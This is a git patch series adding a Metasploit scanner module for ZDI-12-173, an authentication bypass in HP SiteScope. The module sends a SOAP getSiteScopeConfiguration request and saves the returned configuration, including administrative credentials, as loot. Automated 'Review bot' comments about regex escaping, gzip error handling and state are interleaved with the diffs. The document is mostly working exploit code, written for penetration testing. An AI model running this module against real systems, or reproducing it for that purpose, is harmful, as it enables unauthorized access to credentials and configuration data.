From 534ab55e5c484644918a2e45ab3b831d0ab6c48f Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Wed, 5 Sep 2012 12:53:03 +0200
Subject: [PATCH 1/2] Added module for ZDI-12-173

---
 .../hp_sitescope_getsitescopeconfiguration.rb | 131 ++++++++++++++++++
 1 file changed, 131 insertions(+)
 create mode 100644 modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb

diff --git a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb
new file mode 100644
index 0000000000..4465a4a9e8
--- /dev/null
+++ b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb
@@ -0,0 +1,131 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'HP SiteScope SOAP Call getSiteScopeConfiguration Configuration Access',
+ 'Description' => %q{
+ This module exploits an authentication bypass vulnerability in HP SiteScope
+ which allows to retrieve the HP SiteScope configuration, including administrative
+ credentials. It is accomplished by calling the getSiteScopeConfiguration operation
+ available through the APISiteScopeImpl AXIS service. The HP SiteScope Configuration
+ is retrieved as a gzipped file containing Java serialization data. This module has
+ been tested successfully on HP SiteScope 11.20 over Windows 2003 SP2.
+ }, + 'References' => + [ + #[ 'OSVDB', '' ], + [ 'BID', '55269' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-173/' ] + ], + 'Author' => + [ + 'rgod ', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE + ) + + register_options( + [ + Opt::RPORT(8080), + + ], self.class) + + register_autofilter_ports([ 8080 ]) + deregister_options('RHOST') + end + + def rport + datastore['RPORT'] + end + + def run_host(ip) + res = send_request_cgi({ + 'uri' => '/SiteScope/services/APISiteScopeImpl', + 'method' => 'GET'}) + + if not res + print_error("#{rhost}:#{rport} - Unable to connect") + return + end + + access_configuration + end + + def access_configuration + print_status("#{rhost}:#{rport} - Connecting to SiteScope SOAP Interface") + + data = "" + "\r\n" + data << "" + "\r\n" + data << "" + "\r\n" + data << "" + "\r\n" + data << "" + "\r\n" + data << "" + + res = send_request_cgi({ + 'uri' => '/SiteScope/services/APISiteScopeImpl', + 'method' => 'POST', + 'ctype' => 'text/xml; charset=UTF-8', + 'data' => data, + 'headers' => { + 'SOAPAction' => '""', + }}) + + if res and res.code == 200 + + if res.headers['Content-Type'] =~ /boundary="(.*)"/ + boundary = $1 + end + if not boundary or boundary.empty? + print_error("#{rhost}#{rport} - Failed to retrieve the SiteScope Configuration") + return + end + + if res.body =~ /getSiteScopeConfigurationReturn href="cid:([A-F0-9]*)"/ + cid = $1 + end + if not cid or cid.empty? + print_error("#{rhost}#{rport} - Failed to retrieve the SiteScope Configuration") + return + end + + if res.body =~ /#{cid}>\r\n\r\n(.*)\r\n--#{boundary}/m + loot = Rex::Text.ungzip($1) + end + if not loot or loot.empty? 
+ print_error("#{rhost}#{rport} - Failed to retrieve the SiteScope Configuration") + return + end + + path = store_loot('hp.sitescope.configuration', 'application/octet-stream', rhost, loot, cid, "#{rhost} HP SiteScope Configuration") + print_status("#{rhost}:#{rport} - HP SiteScope Configuration saved in #{path}") + print_status("#{rhost}:#{rport} - HP SiteScope Configuration is saved as Java serialization data") + return + end + + print_error("#{rhost}#{rport} - Failed to retrieve the SiteScope Configuration") + end + +end + From 20655232d743f0de60b1092bc400340eb4d7d8fb Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 5 Sep 2012 20:03:46 +0200 Subject: [PATCH 2/2] cleanup, tested and added osvdb reference --- .../hp_sitescope_getsitescopeconfiguration.rb | 31 ++++++++++++------- 1 file changed, 19 insertions(+), 12 deletions(-) diff --git a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb index 4465a4a9e8..5bb836f8f8 100644 --- a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb +++ b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb @@ -26,7 +26,7 @@ class Metasploit4 < Msf::Auxiliary }, 'References' => [ - #[ 'OSVDB', '' ], + [ 'OSVDB', '85120' ], [ 'BID', '55269' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-173/' ] ], @@ -41,7 +41,7 @@ class Metasploit4 < Msf::Auxiliary register_options( [ Opt::RPORT(8080), - + OptString.new('TARGETURI', [true, 'Path to SiteScope', '/SiteScope/']) ], self.class) register_autofilter_ports([ 8080 ]) 
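Review bot: In access_configuration the MIME `boundary` captured from the server's Content-Type header is interpolated unescaped into the body regex `/#{cid}>\r\n\r\n(.*)\r\n--#{boundary}/m`; RFC 2046 boundaries may legitimately contain `+`, `(`, `)`, `?`, `.` and `:`, so a boundary chosen by the remote host can make the match fail or, together with the greedy `(.*)` over a large body, backtrack heavily — write `--#{Regexp.escape(boundary)}` instead (cid needs no escaping because its capture is restricted to `[A-F0-9]*`). `Rex::Text.ungzip($1)` is likewise unguarded; it appears to wrap Zlib and so presumably raises on a body that is not valid gzip, which would abort the whole scan on one misbehaving host instead of just reporting that host, so a `rescue` around it that prints the error and returns would be more robust. Minor style: the `$1` captures would read better as `Regexp.last_match(1)` or named groups. The SOAP request-body string literals render as empty strings on this page, so they were not reviewed.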
@@ -53,12 +53,18 @@ class Metasploit4 < Msf::Auxiliary end def run_host(ip) + @peer = "#{rhost}:#{rport}" + @uri = target_uri.path + @uri << '/' if @uri[-1,1] != '/' + + print_status("#{@peer} - Connecting to SiteScope SOAP Interface") + res = send_request_cgi({ - 'uri' => '/SiteScope/services/APISiteScopeImpl', + 'uri' => "#{@uri}services/APISiteScopeImpl", 'method' => 'GET'}) if not res - print_error("#{rhost}:#{rport} - Unable to connect") + print_error("#{@peer} - Unable to connect") return end @@ -66,7 +72,6 @@ class Metasploit4 < Msf::Auxiliary end def access_configuration - print_status("#{rhost}:#{rport} - Connecting to SiteScope SOAP Interface") data = "" + "\r\n" data << "" + "\r\n" data << "" + print_status("#{@peer} - Retrieving the SiteScope Configuration") + res = send_request_cgi({ - 'uri' => '/SiteScope/services/APISiteScopeImpl', + 'uri' => "#{@uri}services/APISiteScopeImpl", 'method' => 'POST', 'ctype' => 'text/xml; charset=UTF-8', 'data' => data, @@ -98,7 +105,7 @@ class Metasploit4 < Msf::Auxiliary boundary = $1 end if not boundary or boundary.empty? - print_error("#{rhost}#{rport} - Failed to retrieve the SiteScope Configuration") + print_error("#{@peer} - Failed to retrieve the SiteScope Configuration") return end @@ -106,7 +113,7 @@ class Metasploit4 < Msf::Auxiliary cid = $1 end if not cid or cid.empty? - print_error("#{rhost}#{rport} - Failed to retrieve the SiteScope Configuration") + print_error("#{@peer} - Failed to retrieve the SiteScope Configuration") return end 
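Review bot: `@uri << '/' if @uri[-1,1] != '/'` in run_host appends in place to the String returned by `target_uri.path`, so it mutates the object target_uri handed back rather than a copy; that is presumably harmless if target_uri builds a fresh URI on every call, but `@uri = target_uri.path.dup` followed by `@uri << '/' unless @uri.end_with?('/')` does not rely on it. `@peer` and `@uri` are instance state set here and read later by access_configuration (hunk @@ -66), so that method now silently depends on run_host having run first; passing them as arguments, or computing both in a small private helper, would make the dependency explicit. The GET probe still only checks `if not res`, so any non-nil response, whatever its status code, falls through to access_configuration; if the probe is meant to confirm the service is present, compare `res.code` as well.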
@@ -114,17 +121,17 @@ class Metasploit4 < Msf::Auxiliary loot = Rex::Text.ungzip($1) end if not loot or loot.empty? - print_error("#{rhost}#{rport} - Failed to retrieve the SiteScope Configuration") + print_error("#{@peer} - Failed to retrieve the SiteScope Configuration") return end path = store_loot('hp.sitescope.configuration', 'application/octet-stream', rhost, loot, cid, "#{rhost} HP SiteScope Configuration") - print_status("#{rhost}:#{rport} - HP SiteScope Configuration saved in #{path}") - print_status("#{rhost}:#{rport} - HP SiteScope Configuration is saved as Java serialization data") + print_status("#{@peer} - HP SiteScope Configuration saved in #{path}") + print_status("#{@peer} - HP SiteScope Configuration is saved as Java serialization data") return end - print_error("#{rhost}#{rport} - Failed to retrieve the SiteScope Configuration") + print_error("#{@peer} - Failed to retrieve the SiteScope Configuration") end end